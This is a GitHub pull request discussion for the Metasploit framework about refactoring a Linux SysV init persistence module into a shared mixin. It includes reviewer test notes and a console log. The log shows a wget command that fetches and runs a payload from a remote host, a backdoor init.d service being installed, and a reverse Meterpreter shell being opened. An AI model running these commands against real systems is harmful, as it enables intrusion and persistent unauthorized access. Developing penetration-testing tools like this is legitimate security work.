update systemvinit to persistence mixin #20522
Conversation
h00die
force-pushed
the
modern_persistence_sysvinit
branch
from
72d43ea to
7bdc730
Compare
| * CentOS <= 5 | ||
| * Debian <= 6 | ||
| * Kali 2.0 | ||
| * Ubuntu <= 9.04 |
There was a problem hiding this comment.
Currently trying with ubuntu 9.04 and it's not working for some reason.. i'll give it a shot tomorrow aswell.
There was a problem hiding this comment.
I have a 10.04 laying around. Default payload cmd/linux/http/x64/meterpreter/reverse_tcp uses curl, which isn't loaded on the system by default. When I switched to wget it worked fine.
msf exploit(linux/persistence/init_sysvinit) > set fetch_command wget
fetch_command => WGET
msf exploit(linux/persistence/init_sysvinit) > rexploit
[*] Reloading module...
[*] Command to run on remote host: wget -qO ./JkKvDlANMv http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./JkKvDlANMv;./JkKvDlANMv&
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /t70WmtC4mNeBieRpZqn09Q
msf exploit(linux/persistence/init_sysvinit) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] Payloads in /tmp will only last until reboot, you want to choose elsewhere.
[+] The target appears to be vulnerable. /tmp/ is writable and system is System V based
[*] Writing backdoor to /tmp//jSUGHMMqg
[*] Utilizing update-rc.d
[*] Writing service: /etc/init.d/lZDIiBrrkY
[+] Enabling & starting our service
[*] Client 1.1.1.1 requested /t70WmtC4mNeBieRpZqn09Q
[*] Sending payload to 1.1.1.1 (Wget/1.12 (linux-gnu))
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:51587) at 2025-10-13 13:58:48 -0400
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/ubuntu10.04_20251013.5848/ubuntu10.04_20251013.5848.rc
There was a problem hiding this comment.
wait, if is working for Ubuntu 10.04 didn't maybe you wrongly stated the system supported in the docs between the upstart persistence and the sysv one? because in this PR is stating that should be Ubunut less or equal to 9.04
There was a problem hiding this comment.
Trying to find an answer... https://blog.packagecloud.io/ubuntu-a-journey-from-system-v-to-system-d/ says sysv only lasted till 6.10, but my proof shows otherwise unless there was an overlap in systems or some backwards compatibility built in
There was a problem hiding this comment.
Maybe it is just backwards compatible: https://www.reddit.com/r/linux4noobs/comments/5f7or8/comment/dai4p86/
There was a problem hiding this comment.
yep, i'll pull an ubuntu 6.06. and see how it goes.
h00die
force-pushed
the
modern_persistence_sysvinit
branch
from
7bdc730 to
7a8189f
Compare
documentation/modules/exploit/linux/persistence/init_sysvinit.md
Outdated
Show resolved
Hide resolved
Release NotesThis pulls out systemvinit from the init persistence module and adds new persistence mixin. |
3 participants
Pulls out systemvinit from the init persistence module and adds new persistence mixin. Part of #20374
Verification
msfconsolessh_loginfor instance)use exploit/linux/persistence/init_systemvinitset SESSION <id>exploit